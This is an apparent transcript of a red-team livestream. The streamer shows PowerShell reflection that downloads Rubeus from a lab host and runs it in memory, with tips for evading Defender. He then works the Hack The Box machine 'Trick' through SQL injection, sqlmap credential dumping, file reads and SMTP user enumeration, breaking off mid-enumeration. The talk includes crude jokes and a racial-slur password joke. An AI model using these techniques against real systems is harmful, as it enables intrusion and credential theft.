All right. Welcome. Welcome, one and all. Finglui Muguanoff Cthulhu. Rilye Gagnagel Fat. I was on time. It is exactly 5 p.m. Eastern. I am on time. So the yeses have it. Welcome in. Sick glasses? Hey, thanks, man. They help with the blue light. I find anecdotally that they help with the blue light and eye strain by looking at this shit all day long. I will never bet yes on this. Gunnars? Yep, they're Gunnars. I've had them for like 10 years. I've had them along. These are old ones. Oh, how is everybody doing? How is everybody on this fine day? How is everyone? Today is the day of our Lord Cthulhu Chthursday, so we'll be taking on just about anything. We tend to do the harder boxes on Cthulhu Chthursday, but as always, I'm down to do whatever you guys want to do. Whatever you guys want to see. We could complain, but would it change anything? No. It decidedly would not. It decidedly would not. I did finish my last job yesterday, and I don't start until Monday, so I'm using those. I'm using the last few days of this week to. We're using these last few days to work on a new course for you guys. For those of you who love to take courses. For those of you guys who absolutely just love to take courses for some reason. I'm working on one of those for you guys. I'm working on one of those. Hit me, course guy. I don't want to say exactly what it's going to be on just yet. It will be red teaming, practical red teaming oriented. I don't know if it's... I would like to make it... I would like to have like a lab, but the lab is too complicated to set up. To reasonably set up. Like, for example... Husky's PMAT course has you set up your own lab at the beginning. And that works for him, but for me, I don't think that's really going to work out. So I'm going to need to have like a Snap Labs thing, a Snap Lab setup or something like that. Will it be on Udemy? I'm not sure yet. Stand by on that. I can't. It's still very early. I'm making the course right now. It may be on. I'm going to actually, I think, go to TCM as like an olive branch, actually, because I don't know why he still hates me, but as an olive branch, I'm gonna try to. I might try and talk to him, and say, hey, I'm making a new course. Do you want it on your platform? So, and then we can be friends. You know, that's what I. We'll see. Or it could be we put it on Taggertech's website. We'll find out. We'll figure it out. Bottom line, I think there's no reason to hate you. Well, there is some bad blood there, but not on my end. Like, I don't dislike him. He's the one who doesn't like me. It's a long story. In his mind, he does have reasons to hate me, I think. I don't think they're good reasons, but what level and cost? This will be a red teaming course. It will be focused on practical red teaming. It's not intended as a replacement to CRTO, more of a specialized. It is not meant to be a replacement or a competitor to CRTO. It will be covering one specific area of red teaming. I don't want to talk about it just too much just yet because I haven't even really started making it in earnest. All I've done is set up a lab, and I'm starting to compile all the things I want to. I'm starting to compile all the things that I want to talk about in the course, and then once I've done with that, I'll write out a syllabus, like what I want all the modules to be, and then I'll start actually making it. Can we get all Hazred certified then? You can. You can. You can. You certainly. I'm not sure there's going to be a cert associated with it. I'm thinking about something along the lines of Husky's PMAC course or Tiberius's privesc courses, although it will be more advanced. It will be more advanced than Tiberius's courses. It will be practical. Again, I'm going to probably look into Snap Labs for an option to configure a lab so that you can do the attacks that I'm going to show you in such a lab. Sans prices? No. Absolutely not sans prices. It's gonna be, I'll have to look at the pricing. It's gonna depend on how much the Snap Labs cost to me. But I'll make it affordable. It will be affordable. May count for those coveted CPEs. That's what I'm thinking. Husky thinks the relationship between me and TCM is reparable. So I thought I'd reach out to him and offer this as an olive branch. Like, hey, what if I made a course and put it on your platform, and then we're working together again, and we don't have to hate each other. Isn't CRTO 2 dependent on Cobalt Strike? No, what I have to do has nothing directly to do with Cobalt Strike. Cobalt Strike, I mean, you could obviously use Cobalt Strike for the things I'm going to show you, but we'll be using only open source tooling in my course. Only open source tooling. But so TRTO is not dependent on Cobalt Strike. You get access to Cobalt Strike for the course. It's not dependent on. Cobalt Strike is in the course. What will the course cover? I'm not going to tell you just yet. It is a smaller. It is a niche. Not really niche. It's a red teaming course. One that I haven't seen. I haven't seen a course on this topic yet. So I've decided to fill that gap. Give me a few more days to work out some of the. Give me a few more days to work out some of the details. I've been struggling and learning. Part of learning this stuff is you have to set up a lab that involves it. It will be Active Directory related because most red teaming concepts are Active Directory related. I set up an entire virtual lab on my PC right here, and I've been configuring, testing for the last couple of days actually. So hopefully I'll be able to. Hopefully on Sunday I'll be able to tell you something a little bit more. I've been using Vagrant to spin up AD labs. I mean, I did see some stuff on that in real life, but online. But I don't think Vagrant runs on Windows, does it? Does Vagrant run on Windows? I don't actually know. I could do. It does run on Windows. Okay, well, I could try that next time. I mean, really, I just wanted to do it manually. I wanted to do it manually here, because it's just better for me to do it manually, so I learn the ins and outs of things right now. It's not by far. This is not the first AD lab I've set up, but it's the first I've set up with certain services enabled. So a lot of it is just poking and prodding and trying stuff out and learning. Can you just pack the virtual lab from your machine and make it available from whoever buys the course? I'm gonna just no. Absolutely not. I can see the week after I do that, Doom Die. Excuse me. I can see the week after I doing that, some 0-day container escape is released in VirtualBox, and then somebody's rooted my machine in the next hour. Yeah, no, I'm not doing that. Absolutely not. No, it needs to be like Snap Labs or something where everybody's going to get their own isolated lab, and the lab will be set up exactly to my configurations every single time. That's what it's going to have to be, because I don't want to be doing a whole lot of support for this. And I can see the support. If I have people set this up with like Vagrant or something, it's going to be a support nightmare. Also, they might not have the. I'll have to look into it. I haven't looked into the options for that just yet. I have to write the course first. use AWS. I'm not doing those things. Because then everybody's going to be playing around on it all at once, and I can't have that happening. All right, let's find out what we're doing for the day. What are we doing? Again, Snap Labs seems like the most reasonable choice for me right now with the least amount of support. Again, I'm not going to tell you what the content's going to be just yet, Turco. You're going to find out in a few days. Your daily pro tip from today. Oh, the reflection one? Yeah, I can potentially show that off if you want me to. Let's see. How do I want to do that? How do I want to do that? I guess I can just use my Windows dev box. We could try using the Windows dev box. Hang on a second. Oh, we still have the DC running. Why is the DC still running? I shut you down, sir. Shut down. There we go. I already have more than enough courses. Nobody ever has enough courses because here's what you start a course, you get halfway through it, and then you peter out and you move on to another one. Snap Labs little because you attach your AWS and then get a bill for $500 when you don't turn it off. Well, ideally I have to find out how it works. I have to find out how Snap Labs works before and then I'm going to have to do the math to figure out how much I'm going to have to charge to make it worth it. I can see the course in your glass. No, you can't. You can't see anything in my glasses other than stream... OBS, maybe. Okay, there we go. All right, let's start up. VirtualBox 7 seems like it's a no-go, guys. If you haven't upgraded to VirtualBox 7, don't do it. Okay? Don't do it. Save yourself. Save yourself, kids. Okay? I'm too afraid to revert it right before the stream. I did not rebuild my Kali. I've been super busy the last couple of days. I need to get around to rebuilding it. I've just been focused on other things. So we're just gonna hope to God today that it doesn't give us too hard of a time, okay? Al is releasing a course with a Snap Labs environment. I think I want the lab to be optional. Like, you can either buy the course without the lab, and if you want the additional lab, it's going to be an additional cost. Yeah, I see that Hack the Box one. We're going to do Hack the Box. Don't you worry. Shit. Okay, good. I remembered the password. Sometimes I can't remember the password to my frickin' box. Okay, it's complaining about the guest editions. Okay, because the guest editions are out of date. Okay, let's go over here. Again, we're just going to show off today's... So for those who don't know what today's tip was on Twitter... Do you plan to stay on Twitter long term? Honestly, I don't even know. I don't even know. I only just started playing the Twitter game. Okay, that's going to be a like. Okay. We come over here. Here we go. So this was my tweet today. You don't need to write a .NET assembly to disk to execute it. Use reflection. And then I show you how to down this first one is how to download a .NET assembly, and this is going to execute it. Okay? So let's demonstrate this really quickly. We can open up CRT. What do we have today? We're doing, we're going to do Hack the Box here in a little bit. We're going to do Hack the Box here in just a little bit. And is it window rules? How did I set the... How did I set the size of this stupid thing? Configure, I think it's special application settings, I think. Yeah, here we go. We remove this, we remove this. We add property. We add size, add property. Position. There we go. Now if we start it, it'll be the right size. That looks good. Okay. All right, so let's go to Sharp Collection. And let's get... We'll do Net Framework 4.5 will probably work just fine. So we'll set up a web server, and we'll pull down Rubius. You do need to do this in PowerShell. We'll run it as administrator, because why not? Oh, let me disable Windows Defender. Because otherwise Windows Defender is going to complain at me. Okay. All right, so now we'll do... Okay, so we're going to do $D equals new object system dot net dot web client download data and what's the IP address of my Linux machine? Uh, 10.0.0.82. 10.0.0.82. Rubius.exe. So remember, we're hosting it on our Linux machine, and we're going to download it here and save the binary of Rubius into this variable. Is it not working? What's going on? What's the holdup? Oh, fuck. I'm an idiot. Turning off... Windows Defender will complain about Rubius, not the technique. I'm too lazy to obfuscate Rubius for this. Okay, so it downloaded it. There you go. We got Rubius.exe. Got a 200. Okay, we're good. Now we can execute... Now... the $D variable contains the binary of Rubius. So if I do this, it's going to be some fucking wacky shit. See? I regret my life choices. Okay? I regret my life choices. So this is all this is all the binary data of Rubius. Okay? You even go to local meetups and not understand most of the talks? What do you mean by that? I go to local meetups. I went to one last week. All right, so now we're going to do $A equals... So we're going to use the system.reflection.assembly load. So we're gonna load a .NET assembly directly into memory. And we'll just feed it the binary data saved in $D, which is Rubius. Okay, now we can do...
A hunter must hunt.
How did I do this on the... I pasted this in a weird way. I think I need to do it this way. I need to do load Rubius dot program. I can't remember if there was supposed to be a space there or not. We're going to find out. Main. We're going to call the entry point, and we'll do triage. You can use any of the arguments here. I just chose triage because it was short, and I'm always trying to get these to fit within. Yeah, there must need to be a space here. How did I do this before? Maybe it needs to be done on 2 different lines. Like that. And then just call it directly, maybe? I think that's what you do. We can do tac H. Yeah, there we go. Okay. I don't know why I decided to save it to a variable. It doesn't need to be saved to a variable. But do you see how I was able to execute Rubius without actually downloading it to disk? Do you see why I was able to... you don't actually need this $A for anything. You can remove that. I don't know why I put that in the example. So we downloaded an assembly. Then we used we told PowerShell, hey, load this assembly into memory. And then we called it directly, because now it's in PowerShell's memory space. Does that make sense? So this is the namespace. The namespace in Rubius is called Rubius. Obviously. The primary class, the entry point class of Rubius is called program. This is going to vary depending on the .NET assembly that you use. Like if you use sharphound, I think sharphound is still program. But the namespace would be sharphound. And then this is the entry point, which is almost always going to be main. This is usually going to be main. I think it has to be main by .NET convention. And you can put whatever arguments you want in there. Like, you can put a whole, like, line here. Like, there's not just one. That's why this dot split is here. You could just put ask TGT user alhazred certificate al.pfx password Cthulhu fhtagn ptt, something like that. You can do a whole normal argument string for Rubius there. Does that make sense? That's because this dot split is here and is automatically dividing up all those arguments for us to feed to it. Hopefully that makes sense. That's not gonna do anything here because I'm not joined to a domain and I don't have a domain controller to ask for a TGT from. But if you do triage, it'll show you all the stuff. You only have to download it the one time. You only have to download it the one time for as long as your PowerShell session lasts. Does that make sense? I mean, you can still be detected in memory if you use volatility, for example. Absolutely. I'm not trying to say this can't be detected. All I'm saying is it's cleaner than writing a .NET assembly to disk. That's all I'm saying. You don't want to write if you can avoid writing a .NET assembly to disk, that saves you some hassle, and it also keeps you from being detected. You still need to obfuscate this. Like, Windows Defender will flag on the word Rubius alone. You at least need to change this namespace of Rubius. Yeah, like, you need to change some other stuff. There are other signatures in Rubius for Windows Defender, but you would need to obfuscate this, but then you can load it into memory, just like I just did. Can someone get the... It's on Twitter. It's literally on my Twitter. Blue team has not pointed out detection method. I mean, this is fair. I mean, that's because the majority of them just wouldn't catch it. Boom! But in reality, a competent blue teamer could catch this. Like, in-memory analysis will catch this. EDRs, an EDR DLL will catch this. You may be flagging on the reflection being used. Like, there's any number of ways that this could be detected on. I'm not trying to say this is the stealthiest thing in the entire universe. It's definitely stealthier, though, than just downloading Rubius and running it from disk. That's for sure. Okay? I'm just showing you a way that you can execute this stuff in memory without running without downloading it to disk. So we just do hard drive with .NET reflection. We just, so it's like this. This is how we downloaded it. This will download the binary data, download data. It will download the binary data of rubius.exe and save it into this variable. And you don't actually have to do this $A thing. I could have left that out. I don't know why I put that in there. But you use this just to you just load the assembly. This is how you load the binary data that we just downloaded into memory, and then you can just execute it by calling the entry point directly. You can also execute a method directly from this. Like, you don't have to start at the entry point. You can execute any of Rubius's methods. You just have to know what its classes and what its classes and methods are. And you could I just showed you how to execute it from the entry point. Does that work with reverse shells? Yeah. Well, exe file has to be a .NET assembly. It has to be a .NET assembly, OreoByte. And then you would need to call it just like this, and it would still execute. It would execute just fine. So we never wrote a file to disk. Everything's in memory? Correct. Everything is loaded directly into memory. Nothing is saved to disk via this technique. There's a similar technique with add type, which will result in you can feed it clear text. You can feed it uncompiled C# code, but then it'll be compiled, and the compiled assembly will be saved to disk before it's loaded into memory. So you just want to be aware of that. It's not so great. It works with reverse shells as long as the PowerShell doesn't die. Right. If you would have to migrate out of this. If you started a beacon or something, you'd have to migrate. You'd have to generate a .NET assembly in order to do it this way. Maybe class or method being private. Yeah, I mean, if it's private, you're not going to be able to call it direct from externally. That's for sure. I'm pretty sure you cannot call private methods this way. All right, any questions about that before we move on? We're going to do Hack the Box today. I don't know which Hack the Box we're going to do, but let me just actually get logged into Hack the Box. All in all, it's a cool method. Yeah. I think most seasoned red teamers are aware of how reflection works. But, not everyone is a seasoned red teamer, and I don't write my tips purely for seasoned red teamers. So knowing about reflection is pretty cool. Will this work on older PowerShell? Yes. What you have to understand about PowerShell is that regardless of which version of PowerShell you're using, PowerShell is just a scripting language front end for .NET. And that's what C# is too. C# is compiled .NET code, and PowerShell is .NET code that's scripted. It's all the same language under the hood. PowerShell and C# are joined at the hip. As long the .NET assembly version is what matters. You want to make sure you're using the right .NET version. Rubius, I think this is .NET 4.7 or 4.8. I think this is 4.8 if I had to guess. I'm not sure exactly. I'm too lazy to look. All right, let's go to Hack the Box. Let me get logged in. If I cross-compile C# with .NET on Linux, this should work, right? Yeah, C# is cross-platform. What about Go or Nim? Those are not .NET assemblies. Will not work with it. You'll have to map those directly into memory, and that's a much more complicated technique. Here, we're just taking .NET code. Rubius is .NET, and we're telling .NET scripting language of PowerShell, hey, load this .NET code. That's surprisingly easy to do. With Nim, you're just looking at a raw C executable. You're going to have to map that directly into memory. It can be done, but it's a much more involved and complicated method than a couple of lines in PowerShell. You will also have to map that directly into memory. Also with C++, yes. Like, you'd have to write the PE directly into a new section of memory where that PE could go. You'd have to set it up. I'm sure that there's references online to figuring out how to do it. But, again, it's much more involved than 2 lines of PowerShell. This works with .NET assemblies. Rubius is a .NET assembly. Okay. Oh, these are the active boxes. I'm like, I haven't seen any of these before. All right, what are we doing? What was the most... Looks like I've done the ones that most recently were, Didn't we do Scrambled? I think we did Scrambled, didn't we? PlayStation? God, don't say those words! Fortnite! Fortnite. Okay, listen. Fortnite, we need to have words. Look at me. Look at me directly in my eyeballs, okay? Look at me. We're 6 days out. I'm on the verge of collapsing in on myself with hype like a neutron star. I'm gonna need you to shut the fuck up and not remind me that I'm 6 days out. Rest assured, I am remembering at least once every 15 minutes. Fucking Christ. Ugh. 6 days out. UTZ next! Okay. Okay. Listen. Apparently. Okay. You may all be wondering why I bother. Why UTZ Mix may be wondering why I bother teaching all of you this crap 3 times per week. Is it A, the extra $9 that I make per week from your subscriptions? Or B, the idea that I'm actually making a difference in the cybersecurity community and affecting people's lives and giving back to the community I love so much? Let me tell you, it's all about the $9, okay? But in order that the $9 gets inputted into my bank account, by the way, please like and subscribe, I'm gonna need you to get all the way off my back. All the way off my back about my molding. So now that we've established that, oh, I know exactly what you're saying, Fortnite. You're all good. You're all good. All right, what are we doing today, fellas? I need to start actually submitting the flags on these. I do so many of these over in the mod lab, and then I don't submit the flags. So I can't remember that if I've actually done these or not. I don't care about submitting the flags. That's the thing. But I can't remember if I've done the box or not, or a box enough. Okay, I can't remember if I've actually done the box. So you guys are gonna have to remind me if I've done some of these. We did time lapse. I remember that one. I think we did object. Did we not do object? I think we did object. I think Stream.io we have not done on stream, at least. I did this in the Discord, I think, with the Discord group, but it was some time ago and I don't remember. What do you guys want to see? Let me take a look at my notes. That's a good idea. Let me check my notes. Okay, do I have one for object. So clearly I've done object, but actually I have a note page for object with no notes in it. So that's just, did I actually do the box? Or am I just that bad at taking notes? Okay, I'm just gonna mark ones from chat, okay? Listen, you're saying that I see acute. There is no Fortnite box. I'll put object in there for funsies. Hone an easy box in under 15 minutes. Welcome to Hack the Box. You've clearly never been here before, but last week a Hack the Box machine broke me so badly that I'm making a whole fucking course to prove that I understand the concept. Stream.io we can put in there. And we'll put some Linux machines in there. What Linux machines do you people have to want to do? Faculty? Okay, if you're saying I'm just faculty. Faculty. All right, faculty. We'll put trick in there. Because it's still Halloween week. Okay, I picked ones that were from chat, so hopefully one of these is decent. Faculty and trick. Okay, get your votes in. All right. Rodryo with the first time Bezos indoctrination. Welcome in, my friend. Virtue Attack with the converting his Bezos indoctrination into a real indoctrination. Welcome in, Virtual Attack. Thank you so much. Lawman, thank you for the 5 months. And Bonzo Idos, also converting his Bezos indoctrination into a real indoctrination. Thank you so much, my friend. Bada Base and Neatelit, thank you for the follows. How you doing today? I'm doing okay. Can't complain. Starting a new job on Monday. What's the difference between pen tester and ethical hacker? The second one is cringier. Like, I only describe myself as an ethical hacker to, like, a layperson. Like, if grandma asks me, what are you doing for work today? Work these days? An ethical hacker, grandma. Okay. Because if I say penetration tester, she's gonna think it's something dirty. Okay, I can't have that. Yeah, none of us ever call ourselves ethical hacker. We don't sit around going, "Hey, do you guys enjoy hacking ethically?" No. Cringe, my dude. Johnny Sins is making good money. I'm not saying he's not making good money. I'm not saying he's not. I mean, that's why I got into hacking. I got into hacking for the same reason anyone gets into it. Chicks, power, money, and chicks. All 4 reasons I got into hacking. All right? And believe me, the pussy is everywhere. The chicks are absolutely everywhere. You forgot chick? Oh, right. Chicks. 5 things. Chicks, money, power, and chicks, and chicks. That's the reason why men do anything? Are you going to do a machine? Yeah, we're voting on one right now. Hey, welcome to the stream, Cyberwise. We're voting on one. We're doing trick, as it turns out. 46% of the vote. Girls are impressed by money, but not tech stuff? Oh, you're not hanging out with the right girls, okay. Okay. chicks get scared when you tell them about hacking. I've had that before. Like a girl, like a woman asking me, like half jokingly and half serious, how do I know you're not going to hack me or whatever? And I'm like, so the first answer I had to this question was, how do you know I'm not gonna like beat the hell out of you and stuff you in the trunk of my car and like kidnap you or whatever? And I thought this was a funny answer. A funny question. I thought this was a funny retort. Because it's like, the answer is just like, you trust them not to. But on a first date, this does indeed send the wrong message. So I do not recommend that unless it's with somebody that that would understand that you are in fact joking. The answer I go with now is, if you're good at something, never do it for free. And then they go, oh, that's the Joker from The Dark Knight, and then we can start talking about Batman instead. Like that's how you move on from that topic. And you don't come off like you're gonna commit a felony. Okay, let's go ahead and start up Trick here. Okay, deploy to lab. There we go. It's like I've forgotten how to use the HacktheBox interface, which I blame them on. I blame on them because, honestly, this interface is crap. Even the old interface is still crap. It's all crap. All right, we're doing Trick. All right. There we go. Alrighty. Stream Raiders? I thought, do you guys want to do Stream Raiders or Marbles today? I don't want to do both of them. Is it possible to be like Elliot and work for E-Corp? So E-Corp isn't a real company. E-Corp is not a real company. In the real world, it's called Fannie Mae. Oh, yeah, box name. Thank you. Try hack me Trick. Or not try hack me. Not try hack me. God, you know, this is completely out of left field, but I'm remembering it now. Like, every year I do I play through Bloodborne again around Halloween just because I'm a little bit of a fan of that game. And this time I beat Orphan of Cause on the second try, when that guy usually hands it to me for like at least several tries. That guy just fucking puts it in me. I never did figure out the second phase. I still don't really get Orphan's second phase. He's a wacky son of a bitch. Okay? I beat him on the second try, and then I was like, oh, right, Lawrence. I have to go fight Lawrence. I forgot him last time. Lawrence is optional, he's out of the way, and I always forget to do him. And then I went over to Lawrence, and he kicked my ass for, like, fucking an hour and a half. I hate that boss so much. Oh my god, I hate Lawrence. Ugh. All right, connecting to the VPN. Let's try and ping Trick 10.10.11.166. We can reach it. We see that it is a Linux machine with the time to live less than 64. (166). Alrighty. So we're seeing port 53 open. Port 25. All the kinds of sporting sporting ports open here. What's the TTL average of a Windows versus a Linux? A Windows box will set the TTL to 128 by default, although it's configurable on all these machines. A Linux sets it to 64 by default. Why are most coding channels about web apps? Because web development most apps these days are web applications. Mobile applications are web applications primarily. Everything is web applications these days. So those skills are very much in demand. Okay, we do see a port 80. Let's check out port 80 really quick. Okay, we're working to finish the development of the site. Test at test.com. Notify me. Start Bootstrap. To activate this form, sign up at... This is out of scope, I would assume, right? Yeah, this is some public webpage, so that's not in scope. This is not SSL. View page source. Looks like this is just a static page. We can do GoBuster really quickly. Okay, we're doing the thing. Assets, CSS, this looks pretty normal. Let's hear marbles so we can hear the Malding commentary. We're gonna do marbles in a little bit. We are gonna do marbles. When we're running a scan or something, or port 53 is open. Dig AXFR at 10.10.11.166. Did that actually work? Did I not do that right? Hang on a second. Thank God for hack tricks. See, I did do it right. Yeah, we're doing a zone transfer. I just wanted to make sure I got it correct. But if the zone transfer works, it looks like it just may not have worked. We may just get a yeah, we tried zone transfer. Try zone transfer guessing the domain. I guess the domain could be trick at HTB. Did I do this right? Trick.htb. Purely guessing. All right, well. I mean, you could just guess that this is usually the name. Like, if the box is going to have a domain, it's usually the name of the box.htb. That's pretty conventional. We've got trick.htb, preprod, tackpayroll.trick.htb. Okay, so Okay. So 10, 10, 11, 166. Trick.htb. Let me make sure I get this correct. Here we go. Free pod payroll. And we'll just do trick as well for shorthand. Were there any others? I don't think there were any others. There was root.trick.htb. Which I guess we can throw in there just for kicks and gigs. What if you don't know the domain? How would you find it from the SSL cert? Yes. There wasn't SSL on this webpage, so I could not check an SSL cert. But that would be one way to check the... like, if we were to go to this SSL certificate here, we can view Hacktrix' SSL certificate. And you can see that subject alt names often has alternative names for the certificate. It's going to have a common name, and it may have some alternative names as well. So, there that is. But that's for Hacktrix, not for the actual website. Okay, so pre-prod payroll. We do love pre-prod. What does pre-prod mean, fellas? What does pre-prod mean? Yeah, pre-production. This means it's a development. It's development. And development is often all kinds of fucked up. Okay? It's often all kinds of fucked up. Admin. Okay. Okay, I'm gonna summon the forces of the old ones here, okay? Ready? I'm gonna summon the hacker energy. Or 1 equals 1. Okay, that's the second time. That's the second time that's worked. Out of like 50 times. Out of like 50 times, every time we come to almost every time we come to a login page, I'm like, okay, here we go. I'm going to use the hacker powers, and that almost never works. I think this is the second time it's actually worked. So this time it actually worked. So a little bit of Bobby Tables, little bit of Bobby Tables, it looks like. So with Bobby Tables in mind, we can go ahead and we may be able to get some more shit out of that. We are administrator, as it turns out, which is just splendid. So we can do SQL map to try and get more out of that. Let's open up Burp here. Please Gamba next time. I didn't think it was going to work, honestly. I was only doing it for funsies again. What did you use for the password? Same. You could just do this. And then put literally anything into the password. It doesn't matter. Oh, I'm intercepting, aren't I? Is Burp intercepting? No, it can't be. I just started up another instance.
A hunter must hunt.
Keep up the old one's work.
Yeah, we're going to keep it up, Ichibot. Thanks so much for the 2 months. Welcome back. Rise, KMRCS, and CyberWise. Thanks for the follows. Cthulhu Fountain to you, my friend. And then we got to go to user options. We got to disable. Oh, the socks proxy is disabled. Amazing. We have the technology. Did it work? It did work. Okay. Admin. Admin. Username and password is incorrect. What did I do that for? Don't. Okay, admin. And you can put anything for the password and go or 1 equals 1. And it'll log you in. Like, so it's real. That's all I put for the password. You could have done that in the username field as well. This is the post request right here. Let's send this to repeater. We'll put username equals admin, password equals password. We can copy to file. Not try hack me. Hack the box. Trick. Login.request. Okay. We can do SQL map. Tac R. Login.request. Batch. All right. So it should find a SQL injection like immediately. So we'll let that go while we browse around in here. Let's see what we have available. We see John Smith. I bet you there's cross-site scripting in every single one of these fields. Like we can try like image source equals A, on error equals alert 1. Did we break it? It might just be getting a ton of overload from SQL map here. You have angered the hacking gods? Clearly, yes. Frauchi, welcome in, my friend. Come on, dude. All right, well, we don't really need SQL map anyways. Or we don't need so SQL map is causing some unexpected behavior. That's what we're gonna call that. Yeah, SQL map is fucking it all up. But it did find an injection, and that's what the important thing is. Tac DBMS. I think it's MySQL. Yeah. Tac DB. Is it Tac DBMS MySQL? Or is it Tac DBMS? Okay, hopefully that's right. I think, is it Tac? I can, Okay, yeah, there you go. All right, then we can do databases. What did I do wrong? Is it, I don't want to do dump. Dump is just gonna fucking drop everything. Is it TACPAC DBS? How have I forgotten all these options? There we go. Payroll DB. Okay, TAC D, capital D, payroll DB. Okay, TAC tables. Okay, so we do have, we can do users. Users, TAC dump. All right, Super Gucci Rainbow Cake.
A fine addition to my collection.
You might say, what the hell kind of password is this? And my answer is a strong password. Okay. I mean, if you want the big brain, just make all of your passwords variations of the N-word. Who's putting the N-word in their password guessing tricks? Or in their password guessing lists? That's the big brain of it. Payroll DB users. Were there any other databases that were interesting? Knowing people, yeah. Payroll items. The rest of these are probably not interesting, right? Because I think they're all just visible to us here. Deduction list. Okay, so I guess we can try. We don't have any usernames is the problem. I doubt that administrator is going to work for us here. We could check the other tables to see possible users. Let's look at the other tables. Employee list. John Smith. We could do John Smith here. Just gonna try and guess some passwords. Nothing. How about John.Smith? You have a username? No, we don't have a username at all. I'm just gonna post eye emojis in chat. Fuck you, okay? First of all, fuck you. Fuck you, okay? There is a username. Fair enough. Fair enough, okay? People are rude. Enemy Goss. And then Super Gucci Rainbow Cake. Damn it. So that didn't work either. Joke's on you fuckers. The joke's on you fuckers. That didn't work either. You need a fuzzing program? I mean, there's no telling that that's the actual... We could try some of this. Well, it actually loaded something. Is there Etsy Pass WD in here? No. I don't see any Etsy Pass WD. Feels bad, man. Damn it. I don't want to just... Usually the answer on Hack the Box is not to just start brute forcing usernames. That usually is not the answer. That's usually not where you start. SQL map, tac priv. Oh, that's a good idea, yeah. We can do is DBA. No, we are Remo. We are not DBA. So feels bad, man. If we were DBA, we might be able to write to the web root. See what other ports are open. Yeah, good idea. Let's look at that. There's got to be something. Postfix. We're probably going to need credentials for that too. Now you have a user. We have Anemigos, which is a user for this shitty application that we do have access to already. I'd have to add those to my Etsy hosts. Let's try that, actually. What if there are other subdomains? Yeah, it's MySQL. We do have... I mean, I guess we could try Remo. It's not a normal... Yeah, it's true. We could try him. We should. Remo at Trick. And then the password. Nope. Fuck. That was a good idea. Remo. Let's look at the... email headers. Let's do... We can do some of this. We never did a full Nmap scan, did we? That's a good idea. Ten, 10, 11, 166. And we can split the pane, and we can do nmap, tac p25, tac script, smtp star. Try lowercase on an Emigos. We can try that, sure. Nope. Okay. So nothing there. Enum users didn't work. It says it's postfix, but doesn't give us a version. And this is a fairly recent Nginx. No other ports found. Well, it is a trick. Yeah. Frauchi and Heinrey, thanks for the follow. It gives us the SMTP commands. We could verify usernames. Okay, VRFY. So we can do some username enumeration here. Let's do telnet 10 11 166 25. Hello. Oh, it's just very slow. Okay, hello. Okay, hello, Cthulhu. Okay. VRFY, enemy Goss. User unknown. VRFY. What was the one we got from SMB map? Or sequel map, not SMB map. What the fuck am I talking about? Remo. VRFY Remo, user unknown. VRFY administrator. VRFY administrator with a capital A. VRFY enemy Goss. Damn it. VRFY Remo. Fuck. No, we can't. I don't think we can upload files with SMTP. JSmith is good. VRFY JSmith. VRFY John. VRFY John Smith. VRFY John dot Smith. Okay. I hate Telnet. Nope, no up arrow with Telnet. There's gotta be something. What am I missing? Employee list, payroll list. Oh, is it by? Okay, just kill it. So no joy there. Did you check that roots? I did not. Let's check that. I think this is just the same website as before. There were those other departments. I wonder if there's, like, other pre-production environments. We could do GoBuster. GoBuster, dir. We're gonna have to use wfuzz, though, I think. Wfuzz. I don't think that's going to work either. We're going to have to use GoBuster with the host header. GoBuster, is it... How can I not remember? It's GoBuster, what's... How can I not remember what GoBuster's command is for host header? Is it just DNS? Oh, okay. I talked myself out of DNS. I don't know why I thought it was DNS. Oh, it's vhost. That's what I was thinking. vhost. I'm an idiot. I'm thinking slow today. Trick.htb. Subdomains. Not passwords. It's going to be DNS. It's going to be discovery, I think. DNS. And then I always use this big S word list. Try that. Did you try using SQL map to locate Etsy host name or password? I tried. We don't have DBA, so we don't have the file permission, so we can't do that. You don't necessarily need DBA for file read. I think you do. I'm pretty sure you need you don't need DBA, but you need the file permission. You at least need the file permission. SQL map. Can we get the... How do we get permissions with SQL map? There's a way to get all of your permissions. Current DB. Tac privileges? That sounds right. Nope, we don't have the file permission. We don't have it. Why does this user randomly have the file It's okay. It's okay. I'm not mad. I'm not mad. I'm not mad. It's just that you never see this in real life. He has one permission. He has literally one permission, and that's the file permission. Sure. He has one permission. Okay, how do we get... File read? That sounds right. We'll try that. I assume it's going to hex decode this garbage. Oh, now we're hackers. Doesn't this look like a hacker? Don't we look like hackers now, boys? Okay. Yeah, we're looking into the Matrix right now. That shit better have hex decoded this. Oh, obviously, it's Michael. I'm sitting over here like trying. Yeah, it was my next guess. Yeah, exactly. My next guess was Michael. Obviously, it goes an administrator, and then the next most common one, anemigos, and then Michael. Fucking Michael. Does Michael have an SSH key too? Because that would make my life a lot easier. ID RSA. No data retrieved. Okay, so we don't have an SSH key. Can this user randomly read Etsy Shadow as well? Yeah, I guess we can try Michael with the password. Did we get any other subdomains? We didn't, so that's probably just a dead end. Okay, password Super Gucci Rainbow Cake. Come on. Oh, I thought that was working. You cuck. Fuck. We did try, fellas. We did try. Go Buster did not find any other sub? No? Nope. I guess we can read, like, the... we can do, like, var, www, HTML. Alright, no, we need a Etsy. Apache 2. Okay. Where's the Apache configuration file? Etsy, Apache 2. It's just apache2.conf, isn't it? It clearly has multiple subdomains, so I need to see the sites enabled. Damn it! I can't read apache2.conf? Or it doesn't exist? Oh, it's Nginx. We're not doing Apache. It's an Nginx. It's the Nginx config. I don't know. We saw that the web server was Nginx. Etsy, Nginx, nginx.conf. Making progress now, boys. Let's go. Bustin' makes me feel good, feel good, feel good. Alrighty. We have sites enabled. Okay, we have an access log. We have an error log. Include nginx. NC nginx sites enabled. Is there like... Is there a sites enabled? Is there some file in sites enabled? It's sites enabled default. Thank you. Yes. I just need to know what subdomains there are. If there are other subdomains. I don't want to just sit here brute forcing these things forever. Bustin', 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 bustin'. Bustin' makes me feel good. I ain't afraid of no sleep. I ain't afraid of no bed. Pre-prod payroll. You son of a bitch! There is another subdomain. We are busting now, boys. Who is busting in chat right now? Who is busting in chat? This is a roundabout way to find a subdomain.
What are you doing, step bro?
